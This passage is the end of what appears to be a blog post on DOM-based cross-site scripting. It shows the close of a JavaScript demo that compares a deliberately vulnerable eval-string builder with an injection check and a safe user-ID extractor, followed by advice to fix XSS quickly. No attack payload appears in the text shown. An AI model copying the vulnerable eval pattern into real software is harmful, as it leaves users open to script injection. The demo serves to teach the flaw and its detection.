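    var call = buildLogCallVulnerable(u);
    return { url: u, evalString: call, flagged: looksInjected(call), safeId: extractUserId(u) };
  });
}
```

Run demo() to see the vulnerable string flagged for both crafted URLs while extractUserId() returns null for them and "123456" for the benign one.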
Hope this helps and remember to never underestimate an XSS vulnerability. If one shows up on your website, get your developers to fix it ASAP.
Credit goes to the Browser Hacker's Handbook for giving me the initial intro.
Labels: Document Object Model, DOM, Reflected XSS, Stored XSS, XSS